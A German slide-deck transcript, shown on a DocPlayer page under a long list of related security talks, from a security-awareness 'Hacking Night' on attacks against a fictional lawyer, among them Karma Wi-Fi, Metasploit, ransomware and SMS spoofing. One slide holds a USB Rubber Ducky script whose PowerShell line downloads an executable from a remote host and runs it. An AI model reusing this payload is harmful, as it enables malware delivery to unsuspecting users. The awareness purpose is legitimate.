Darf ich mich vorstellen?

Ähnliche Dokumente
Compass Security. Darf ich mich vorstellen? [The ICT-Security Experts] !Sprachstörungen - Datenspionage auf Smartphones

Tablets im Business: Gadget oder sicheres Werkzeug?

Live Hacking Demo Schaffhausen,

Hacking Industrial Control Systems - Angriff am Fließband [ Compass Beertalk Jona ]

Sichere Kommunikation Angriffe auf Smartphones & Laptops. Volker Schnapp Fink Secure Communication GmbH

Kombinierte Attacke auf Mobile Geräte

Überblick zu den aktuellen Sicherheitsrisiken und Schwachstellen im IT-Bereich

AV-TEST. Sicherheitslage Android

Mobile Security - Angriffsszenarien auf mobile Dienste: Wie (un-)sicher sind iphone, Android, Blackberry & Co.?

Aktuelle Bedrohungen

A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch

Demo: Sicherheitsmechanismen von Collaboration- und Community-Diensten

Mobile Security. Astaro 2011 MR Datentechnik 1

Operationales Geschäftsrisiko Cyber-Attacken. Relevante IT-Sicherheitsrisiken für Unternehmen

Mobile App Testing. Software Test im mobilen Umfeld ATB Expertentreff, Wien, Functional Test Automation Tools

Hacking Industrial Control Systems - Angriff am Fließband [ Veranstaltung Ort ]

APTs in der Praxis. 5. Mai 2015 Ulrich Bayer, SBA Research

Virtual PBX and SMS-Server

Advanced Persistent Threat

Mobile Service Management

German English Firmware translation for T-Sinus 154 Access Point

SMARTPHONES. Möglichkeiten, Gefahren, Sicherheit Best Practice Peter Teufl

OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen. Das Projekt Das Produkt

WhatsApp und Co. Sicherheitsanalyse von Smartphone-Messengers. Sebastian Schrittwieser

MDM meets MAM. Warum mobile Sicherheit nicht allein durch MDM-Systeme gewährleistet werden kann

Herzlich Willkommen zum Live Hacking. Die Hacker: Ralf Wildvang Thomas Pusch

Sophos Cloud. Die moderne Art Sicherheit zu verwalten. Mario Winter Senior Sales Engineer

Virtual Private Networks mit zentralem Management Bausteine einer ganzheitlichen Remote Access-Lösung

Aktuelle Probleme der IT Sicherheit

SICHERHEITSPRÜFUNGEN ERFAHRUNGEN

MOBILE SOLUTIONS ROADSHOW

Missbrauchserkennung, Betrugsvarianten & Schutzmaßnahmen im Online-Banking

CHECK POINT MOBILE THREAT PREVENTION

Access Denied someone cryptowalled my network! IKARUS Security Software GmbH 1

Citrix Day 2015 Case Study BKW (NetScaler) ZÜRICH,

Secure Webcoding for Beginners

DIE 3 SÄULEN DER MOBILEN SICHERHEIT

Reale Angriffsszenarien - Überblick

Home-Router als Hintertürchen ins Geschäftsnetzwerk?

VERSION Okt Remote Access mit VPN für BKW- Notebooks Bedienungsanleitung

Ivan Bütler, Compass Security. Compass Security AG

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik

2M05: Sicherheit von IP-Telefonie

Compass Security AG [The ICT-Security Experts]

Innovative Anwendungen mit Unified Communications

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Dr. med. Stefan Hunziker. Information Security in Health Conference 23. Juni 2015, Rotkreuz

CYBERWAR CYBER FACES. Ivan Bütler. Compass Security AG Compass Security AG. Slide 1

Sicherheit industrieller Anlagen im Kontext von Cyber-Security und Industrie 4.0

4Brain IT-Netzwerke IT-Sicherheit

HOTSPOT EINFACH KABELLOS INS INTERNET

Ransomware und MobileTAN. jedes Jahr etwas neues

SICHERHEITSPRÜFUNGEN ERFAHRUNGEN

Home-Router als Einfallstor ins Firmennetzwerk?

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity

Best Connectivity. LogiCloud Wi-Fi Storage Sharer. Art.-Nr. WL0156

P106: Hacking IP-Telefonie

W-LAN - Sicherheit. Cornelia Mayer Andreas Pollhammer Stefan Schwarz. 31. Jänner / 27

Informationen schützen Ihr Geschäft absichern ConSecur GmbH

Web Exploit Toolkits - Moderne Infektionsroutinen -

IT-Forum Darmstadt 16. Mai 2008

wo werden die Daten besser geschützt?

Unified Communications & Collaboration. IP basierende Audio-/Videokommunikation

IT-SICHERHEIT UND MOBILE SECURITY

SMARTPHONE SECURITY. Sichere Integration mobiler Endgeräte

am Beispiel - SQL Injection

Sicherheit: Theorie und Praxis

Gehackte Webapplikationen und Malware

Intrusion Detection Systeme. Definition (BSI) Alternative Definition IDS

Cloud! dotnet Usergroup Berlin. Sein oder nicht sein!?! Robert Eichenseer

ESET Produkte und Technologien. Thomas Uhlemann ESET Chief Education Manager

IT Sicherheit für Industrieanlagen unter Berücksichtigung des IT Sicherheitsgesetzes

IKARUS mobile.security erneut für starke Erkennungsleistung ausgezeichnet

Mobile Device Management eine Herausforderung für jede IT-Abteilung. Maximilian Härter NetPlans GmbH

Mittelstand vs. Konzern Wer ist besser geschützt?

Smartphone-Sicherheit

Mobile Apps: Von der Entwicklung bis zum Test mit HP Software

Oracle Datenbank Security Lösungen

NG-NAC, Auf der Weg zu kontinuierlichem

On the New Threats of Social Engineering Exploiting Social Networks

SanStore: Kurzanleitung / SanStore: Quick reference guide

NVR Mobile Viewer for iphone/ipad/ipod Touch

Administration mobiler Endgeräte

am Beispiel - SQL Injection

Viele Geräte, eine Lösung

Postfinance Sicherheitsfrühstück Unterwegs sicher vernetzt

Sichere Freigabe und Kommunikation

AMAVIS UND KASPERSKY VS. MALWARE

Audit von Authentifizierungsverfahren

SSH und VNC unter Raspbian

Transkript:

Hacking Night mit PROFIs Max Schmitt infiziert - Trojaner, Wu rmer, Viren, Ransomware und weiteres digitales Ungeziefer, das Handwerkszeug von Cyberkriminellen PROFI AG München Marco Di Filippo (MadIFI) Darf ich mich vorstellen? Marco Di Filippo (MadIFI) Computer-Enthusiast seit meiner Kindheit eine Tochter Seit 1996 im Bereich IT-Consulting tätig Werdegang: Von der Elektrotechnik, über TK-Security zur IT-Security Kompetenzen Empirische Sicherheitsprüfungen ICT- Security (VoIP, PSTN, GSM ) Hobbys Fußball-Schiedsrichter Electronic Music ICT-Security MadIFI www.madifi.de 2 1

Nach Feierabend... MadIFI www.madifi.de 3 Germany vs. Poland MadIFI www.madifi.de 4 2

Das Opfer Max Schmidt Seit 2013 betreibt Max als Rechtsanwalt eine eigene Kanzlei ledig, mit Anna in einer Beziehung Merkmale: Ständig auf Achse Hobbys Sport (Squash, Laufen) Klavier Partys MadIFI www.madifi.de 5 Das Opfer MadIFI www.madifi.de 6 3

Das Unternehmen MadIFI www.madifi.de 7 Angriffsvektoren 4

Wo erwartensie den Angreifer? Direkte Attacken BLOCKED PASSED BLOCKED MadIFI www.madifi.de 11 Man in the Middle Phishing Indirekte Attacken (I) MadIFI www.madifi.de 12 5

Indirekte Attacken (II) Malware Mobile Devices W-LAN PASSED MadIFI www.madifi.de 13 Indirekte Attacken (III) Covert Channel Auslieferung via Medium (USB-Stick) Angreifer kontrollieren das Opfer Start via Auto-Start Company Network Internet MadIFI www.madifi.de 14 6

Täglich neue Bedrohungen HEARTBLEED 90 M network devices vulnerable GHOST SHELLSHOCK 70% of all Internet-facing machines exposed FLASH STAGEFRIGHT Billion Android devices possibly affected by major flaw in Media Library WINDOWS Almost every Linux system vulnerable due to glibc flaw Almost every Linux system vulnerable due to glibc flaw Numerous remote code execution vulnerabilities discovered MadIFI www.madifi.de 16 Ganz einfach... MadIFI www.madifi.de 17 7

Ganz einfach... Quelle: www.vnckh.com MadIFI www.madifi.de 18 Ganz einfach... What is your Password? MadIFI www.madifi.de 19 8

Daten-Leaks MadIFI www.madifi.de 20 Öffentliche Quellen MadIFI www.madifi.de 21 9

Arbeitgeber MadIFI www.madifi.de 22 Privates MadIFI www.madifi.de 23 10

Privates MadIFI www.madifi.de 24 Morgens am Flughafen Noch schnell E-Mails checken bevor es in den Flieger geht... MadIFI www.madifi.de 27 11

Der JaSager [Karma-Attack] Yes. Karma-Attack Are you my preferred wireless network (Probe Requests)? Das Smartphone sucht mittels Probe Requests nach bekannten Access-Points Yes: SSID= Test D SSID: Test A? SSID: Test B? SSID: Test C? SSID: Test D? Access-Point MadIFI www.madifi.de 29 12

WiFi-MITM Karma-Attack WiFi Yea h! WiFi available MadIFI www.madifi.de 30 on the Mobile World Congress Wi-Fi Experiment Quelle: https://blog.avast.com/2016/02/24/avastfree-wi-fi-experiment-fools-mobile-world-congressattendees/ MadIFI www.madifi.de 31 13

on the Mobile World Congress Wi-Fi Experiment Quelle: https://blog.avast.com/2016/02/24/avastfree-wi-fi-experiment-fools-mobile-world-congressattendees/ MadIFI www.madifi.de 32 on the Mobile World Congress Wi-Fi Experiment Quelle: https://blog.avast.com/2016/02/24/avastfree-wi-fi-experiment-fools-mobile-world-congressattendees/ MadIFI www.madifi.de 33 14

Beim Kunden angekommen... und noch schnell die aktuellen Quartalszahlen abrufen... MadIFI www.madifi.de 34 Das Schweizer Taschenmesser für Hacker [Metasploit] 15

Metasploit OS Apps Api MadIFI www.madifi.de 36 Watering Hole Attack MadIFI www.madifi.de 37 16

Metasploit MadIFI www.madifi.de 38 Metasploit MadIFI www.madifi.de 39 17

Ransomware MadIFI www.madifi.de 40 Ransomware Quelle:https://www.bsi.bund.de Quelle:https://ransomwaretrack er.abuse.ch/s tatistics/ MadIFI www.madifi.de 41 18

Ransomware Fand innerhalb der letzten sechs Monate eine Infektion mit Ransomwarestatt? Quelle: BSI Umfrage Betroffenheit Ransomware 04/2016 MadIFI www.madifi.de 42 Ransomware Fand innerhalb der letzten sechs Monate eine Infektion mit Ransomwarestatt? Quelle: BSI Umfrage Betroffenheit Ransomware 04/2016 MadIFI www.madifi.de 43 19

Ransomware Fand innerhalb der letzten sechs Monate eine Infektion mit Ransomwarestatt? Quelle: BSI Umfrage Betroffenheit Ransomware 04/2016 MadIFI www.madifi.de 44 Datentausch mit dem Kunden Noch schnell die Daten auf den USB-Stick laden... MadIFI www.madifi.de 46 20

Angriffe mittels Human Interface Device [Rubber Ducky USB Attack] Human Interface Device (HID) DELAY 1000 ESCAPE COMMAND r DELAY 400 STRING cmd ENTER DELAY 400 STRING PowerShell(New-Object System.Net.WebClient).DownloadFile('http://www.madifi.de/files/TLI NK03783000.exe','malware.exe');Start-Process'malware.exe ENTER STRING exit ENTER MadIFI www.madifi.de 48 21

Human Interface Device (HID) USB Rubber Ducky Deluxe Pack MadIFI www.madifi.de 49 Identifikationsfälschung [SMS-ID-Spoofing] 22

SMS-ID-Spoofing Game Over SMS MadIFI www.madifi.de 64 SMS-ID-Spoofing Stagefright: Ein Alptraum für Googles Android-Software-Ökosystem MadIFI www.madifi.de 65 23

SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Beispiel einer Phishing-SMS Originalnachricht des Netzbetreibers MadIFI www.madifi.de 66 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Beispiel einer Phishing-SMS Gefälschte Nachricht auf Grundlage der Netzbetreiber-SMS MadIFI www.madifi.de 67 24

SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Beispiel einer Phishing-SMS Gefälschte Nachricht auf Grundlage der Netzbetreiber-SMS 0800-3302000 MadIFI www.madifi.de 68 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Den Wettbewerber zuhause lassen MadIFI www.madifi.de 69 25

Live Demo SMS-ID-Spoofing SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing zur Ortung Beispiel einer Phishing-SMS zum orten eines Teilnehmers MadIFI www.madifi.de 71 26

SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing zur Ortung Beispiel einer Phishing-SMS zum orten eines Teilnehmers MadIFI www.madifi.de 72 SMS-ID-Spoofing MadIFI www.madifi.de 73 27

Beispiele SMS-ID-Spoofing MadIFI www.madifi.de 74 Premium Rate Numbers MadIFI www.madifi.de 75 28

Beispiele SMS-ID-Spoofing MadIFI www.madifi.de 76 Am nächsten Tag im Büro Die Daten vom Notebook ins Firmennetz übertragen... MadIFI www.madifi.de 94 29

Wissen ist Macht... Wirwollen niemanden zu einer Straftat anstiften! Allegezeigten Informationen dienen ausschließlich dazu sie zu sensibilisieren! Denn nur wer um die Gefahren weiss, kann sich davor schützen. Wenn sie Fragen im Bereich IT-Sicherheit haben, sprechen sie uns an. MadIFI www.madifi.de 95 Offene Diskussion Follow Me @ MadIFI www.madifi.de 96 30

Vielen Dank! Vielen Dank für Ihre Aufmerksamkeit! MadIFI www.madifi.de 97 Kontakt KORAMIS GmbH: Europaallee 5 66113 Saarbrücken Germany info@koramis.de www.koramis.de Marco Di Filippo Business Communication m.difilippo@koramis.de Phone: +49 681 968191 0 Fax: +49 681 968191 900 Mobil: +49 151 2290 39 89 Office Berlin: Uhlandstraße 125 10717 Berlin Germany Follow Me @ Slideconcept: Marco Di Filippo Review: Laura-Louise Di Filippo MadIFI www.madifi.de 98 31

2026 © DocPlayer.org Datenschutzbestimmungen | Nutzungsbedingungen | Feedback